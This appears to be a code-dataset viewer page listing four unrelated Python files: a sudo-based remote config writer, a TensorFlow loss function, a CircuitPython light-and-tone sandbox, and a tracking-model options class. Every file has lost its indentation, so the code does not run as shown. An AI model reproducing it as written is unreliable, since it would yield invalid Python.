def write(self, remote_file=None, content=None, resulting_user='root', resulting_group='root'):
if not remote_file:
remote_file = self.remote_file
if not remote_file:
remote_file = ''
if content:
self.content = content
self.backup_if_no_backup_exists(remote_file)
self.prepare_content_for_write()
with color.for_put():
print "\n>> writing config: "+remote_file+"\n"+('='*30)+"\n"+self.content+"\n\n"
fd = StringIO(self.content)
fd.seek(0)
fd.write(self.content+'\n')
fd.seek(0)
self.service.run('sudo mkdir -p $(dirname %(f)s) && sudo touch %(f)s && sudo truncate -s 0 %(f)s' % {'f': remote_file})
self.service.put(fd, remote_file, use_sudo=True)
self.service.sudo('chown %s:%s %s' % (resulting_user, resulting_group, remote_file))
def backup_if_no_backup_exists(self, remote_file):
i = remote_file
o = '%s.pisetup.bak' % i
if self.service.file_exists(i) and not self.service.file_exists(o):
self.service.cp(i, o)
| 1,781 |
old/dccdc/loss.py
|
DotStarMoney/NBD
| 1 |
2170375
|
"""Loss/constraint functions."""
import tensorflow as tf
def affinity_log_loss(y_true_affinity, y_pred_affinity_logits, weights):
log_loss = tf.nn.sigmoid_cross_entropy_with_logits(y_true_affinity,
y_pred_affinity_logits)
avg_position_log_loss = tf.reduce_mean(log_loss, axis=-1)
example_loss = tf.reduce_sum(weights * avg_position_log_loss, axis=-1)
return tf.reduce_mean(example_loss)
| 451 |
dj-scm/cpx_sandbox.py
|
drpjm/gettin-crafty
| 0 |
2170202
|
import time
from adafruit_circuitplayground.express import cpx
import simpleio
cpx.pixels.brightness = 0.2
while True:
if cpx.switch:
print("Slide switch off.")
cpx.pixels.fill((10,10,10))
if cpx.button_a:
cpx.play_tone(262,1)
if cpx.button_b:
cpx.play_tone(294,1)
print("light level = ", cpx.light)
continue
else:
R = 0
G = 0
B = 0
x,y,z = cpx.acceleration
print((int(x),int(y),int(z)))
if x:
R = R + abs(int(x))
if y:
G = G + abs(int(y))
if z:
B = B + abs(int(z))
cpx.pixels.fill((R,G,B))
time.sleep(0.1)
| 708 |
utils_cv/tracking/opts.py
|
muminkoykiran/computervision-recipes
| 7,899 |
2169058
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import argparse
import os
import os.path as osp
class opts(object):
"""
Defines options for experiment settings, system settings, logging, model params,
input config, training config, testing config, and tracking params.
"""
def __init__(
self,
load_model: str = "",
gpus=[0, 1],
save_all: bool = False,
arch: str = "dla_34",
head_conv: int = -1,
input_h: int = -1,
input_w: int = -1,
lr: float = 1e-4,
lr_step=[20, 27],
num_epochs: int = 30,
num_iters: int = -1,
val_intervals: int = 5,
conf_thres: float = 0.6,
det_thres: float = 0.3,
nms_thres: float = 0.4,
track_buffer: int = 30,
min_box_area: float = 200,
reid_dim: int = 512,
root_dir: str = os.getcwd(),
) -> None:
# Set defaults for parameters which are less important
self.task = "mot"
self.dataset = "jde"
self.resume = False
self.exp_id = "default"
self.test = False
self.num_workers = 8
self.not_cuda_benchmark = False
self.seed = 317
self.print_iter = 0
self.hide_data_time = False
self.metric = "loss"
self.vis_thresh = 0.5
self.pad = 31
self.num_stacks = 1
self.down_ratio = 4
self.input_res = -1
self.num_iters = -1
self.trainval = False
self.K = 128
self.not_prefetch_test = True
self.keep_res = False
self.fix_res = not self.keep_res
self.test_mot16 = False
self.val_mot15 = False
self.test_mot15 = False
self.val_mot16 = False
self.test_mot16 = False
self.val_mot17 = False
self.val_mot20 = False
self.test_mot20 = False
self.input_video = ""
self.output_format = "video"
self.output_root = ""
self.data_cfg = ""
self.data_dir = ""
self.mse_loss = False
self.hm_gauss = 8
self.reg_loss = "l1"
self.hm_weight = 1
self.off_weight = 1
self.wh_weight = 0.1
self.id_loss = "ce"
self.id_weight = 1
self.norm_wh = False
self.dense_wh = False
self.cat_spec_wh = False
self.not_reg_offset = False
self.reg_offset = not self.not_reg_offset
# Set/overwrite defaults for parameters which are more important
self.load_model = load_model
self.gpus = gpus
self.save_all = save_all
self.arch = arch
self.set_head_conv(head_conv)
self.input_h = input_h
self.input_w = input_w
self.lr = lr
self.lr_step = lr_step
self.num_epochs = num_epochs
self.val_intervals = val_intervals
self.conf_thres = conf_thres
self.det_thres = det_thres
self.nms_thres = nms_thres
self.track_buffer = track_buffer
self.min_box_area = min_box_area
self.reid_dim = reid_dim
# init
self._init_root_dir(root_dir)
self._init_batch_sizes(batch_size=12, master_batch_size=-1)
self._init_dataset_info()
def _init_root_dir(self, value):
self.root_dir = value
self.exp_dir = osp.join(self.root_dir, "exp", self.task)
self.save_dir = osp.join(self.exp_dir, self.exp_id)
self.debug_dir = osp.join(self.save_dir, "debug")
def _init_batch_sizes(self, batch_size, master_batch_size) -> None:
self.batch_size = batch_size
self.master_batch_size = (
master_batch_size
if master_batch_size != -1
else self.batch_size // len(self.gpus)
)
rest_batch_size = self.batch_size - self.master_batch_size
self.chunk_sizes = [self.master_batch_size]
for i in range(len(self.gpus) - 1):
chunk = rest_batch_size // (len(self.gpus) - 1)
if i < rest_batch_size % (len(self.gpus) - 1):
chunk += 1
self.chunk_sizes.append(chunk)
def _init_dataset_info(self) -> None:
default_dataset_info = {
"mot": {
"default_resolution": [608, 1088],
"num_classes": 1,
"mean": [0.408, 0.447, 0.470],
"std": [0.289, 0.274, 0.278],
"dataset": "jde",
"nID": 14455,
}
}
class Struct:
def __init__(self, entries):
for k, v in entries.items():
self.__setattr__(k, v)
dataset = Struct(default_dataset_info[self.task])
self.dataset = dataset.dataset
self.update_dataset_info_and_set_heads(dataset)
def update_dataset_res(self, input_h, input_w) -> None:
self.input_h = input_h
self.input_w = input_w
self.output_h = self.input_h // self.down_ratio
self.output_w = self.input_w // self.down_ratio
self.input_res = max(self.input_h, self.input_w)
self.output_res = max(self.output_h, self.output_w)
def update_dataset_info_and_set_heads(self, dataset) -> None:
input_h, input_w = dataset.default_resolution
self.mean, self.std = dataset.mean, dataset.std
self.num_classes = dataset.num_classes
# input_h(w): input_h overrides input_res overrides dataset default
input_h = self.input_res if self.input_res > 0 else input_h
input_w = self.input_res if self.input_res > 0 else input_w
self.input_h = self.input_h if self.input_h > 0 else input_h
self.input_w = self.input_w if self.input_w > 0 else input_w
self.output_h = self.input_h // self.down_ratio
self.output_w = self.input_w // self.down_ratio
self.input_res = max(self.input_h, self.input_w)
self.output_res = max(self.output_h, self.output_w)
if self.task == "mot":
self.heads = {
"hm": self.num_classes,
"wh": 2 if not self.cat_spec_wh else 2 * self.num_classes,
"id": self.reid_dim,
}
if self.reg_offset:
self.heads.update({"reg": 2})
self.nID = dataset.nID
self.img_size = (self.input_w, self.input_h)
else:
assert 0, "task not defined"
def set_gpus(self, value):
gpus_list = [int(gpu) for gpu in value.split(",")]
self.gpus = (
[i for i in range(len(gpus_list))] if gpus_list[0] >= 0 else [-1]
)
self.gpus_str = value
def set_head_conv(self, value):
h = value if value != -1 else 256
self.head_conv = h
| 6,769 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.